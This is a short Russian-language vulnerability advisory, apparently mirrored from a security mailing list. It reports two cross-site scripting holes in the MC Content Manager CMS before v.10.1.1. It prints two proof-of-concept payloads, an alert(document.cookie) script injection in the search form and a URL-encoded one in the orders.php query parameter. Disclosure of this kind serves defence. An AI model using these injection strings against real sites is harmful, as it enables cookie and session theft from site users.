Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25868
HistoryMar 09, 2011 - 12:00 a.m.

Cross-Site Scripting уязвимости в MC Content Manager

2011-03-0900:00:00
vulners.com
15

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting
уязвимостях в системе MC Content Manager. Это
украинская коммерческая CMS.

XSS (WASC-08):

POST запрос на странице http://site/ru/cms/search

"><script>alert(document.cookie)</script>
В поле поиска.

XSS (WASC-08):

http://site/orders.php?act=search&amp;query=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E

Уязвимы предыдущие версии MC Content Manager (до
версии v.10.1.1).

Дополнительная информация о данных уязвимостях у меня
на сайте:
http://websecurity.com.ua/4674/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua